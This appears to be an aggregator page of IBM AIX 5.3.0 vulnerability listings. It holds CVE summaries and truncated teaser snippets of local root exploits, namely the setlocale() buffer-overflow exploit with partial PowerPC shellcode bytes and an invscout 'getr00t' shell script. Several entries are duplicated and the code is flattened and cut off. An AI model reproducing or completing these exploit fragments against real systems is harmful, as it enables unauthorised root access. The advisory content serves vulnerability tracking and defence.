IBM AIX <= 5.3.0 setlocale() Local Privilege Escalation Exploit

No description provided by source. setlocale exploit for aix 5.2 CVE-2006-4254 [email protected] from os import execve bof="a"580+"bbbbccccddddx2fxf2x28x2f" egg="x60"2350 shellcode= by intropy at caughq.org "x7cxa5x2ax79" xor. r5,r5,r5 "x40x82xffxfd" bnel shellcode "x7fxe8x02xa6" mflr r31...

IBM AIX 5.3.0 - 'setlocale()' Local Privilege Escalation

setlocale exploit for aix 5.2 CVE-2006-4254 [email protected] from os import execve bof="a"580+"bbbbccccdddd\x2f\xf2\x28\x2f" egg="\x60"2350 shellcode= by intropy caughq.org "\x7c\xa5\x2a\x79" xor. r5,r5,r5 "\x40\x82\xff\xfd" bnel "\x7f\xe8\x02\xa6" mflr r31 "\x3b\xff\x01\x20" cal...

Stack overflow

Stack-based buffer overflow in the odmsearchpath function in libodm in IBM AIX 5.2.0 and 5.3.0 allows local users to execute arbitrary code via a long ODMPATH environment variable...

CVE-2007-2995

Unspecified vulnerability in sysmgt.websm.rte in IBM AIX 5.2.0 and 5.3.0 has unknown impact and attack vectors...

CVE-2007-0618

Unspecified vulnerability in 1 pop3d, 2 pop3ds, 3 imapd, and 4 imapds in IBM AIX 5.3.0 has unspecified impact and attack vectors, involving an "authentication vulnerability."...

CVE-2007-0618

Unspecified vulnerability in 1 pop3d, 2 pop3ds, 3 imapd, and 4 imapds in IBM AIX 5.3.0 has unspecified impact and attack vectors, involving an "authentication vulnerability."...

CVE-2006-5009

Unspecified vulnerability in xlock in IBM AIX 5.2.0 and 5.3.0 allows local users to execute arbitrary commands and overwrite arbitrary files via unspecified vectors, possibly involving a buffer overflow...

CVE-2006-1247

CVE-2006-1247 describes a local race condition in IBM AIX's rm_mlcache_file (part of bos.rte.install) on AIX 5.1.0–5.3.0 that lets a local user overwrite arbitrary files via a symlink attack on temporary files. NSFOCUS SA2006-03 documents the vulnerability, affected AIX versions, and vendor APARs...

CVE-2005-1037

Unknown vulnerability in AIX 5.3.0, when configured as an NIS client, allows remote attackers to gain root privileges...

CVE-2005-1037

The CVE entry CVE-2005-1037 concerns an unknown vulnerability in AIX 5.3.0 when configured as an NIS client that could allow remote attackers to gain root privileges. The connected sources do not provide technical details, affected subcomponents, exact root cause, exploitation method, or remediat...

CVE-2005-1037

Unknown vulnerability in AIX 5.3.0, when configured as an NIS client, allows remote attackers to gain root privileges...

AIX 5.3.0 - invscout Local Command Execution

AIX 5.3.0 - invscout Local Command Execution !/usr/bin/sh r00t exploit written for the invscout bug reported by Idefense labs http://www.idefense.com/application/poi/display?id=171&type=vulnerabilities coded by ri0t exploitation is trivial but automated with this script www.ri0tnet.net usage...

AIX 5.3.0 - 'invscout' Local Command Execution

!/usr/bin/sh r00t exploit written for the invscout bug reported by Idefense labs http://www.idefense.com/application/poi/display?id=171&type=vulnerabilities coded by ri0t exploitation is trivial but automated with this script www.ri0tnet.net usage ./getr00t.sh : exploitation gives euidroot from...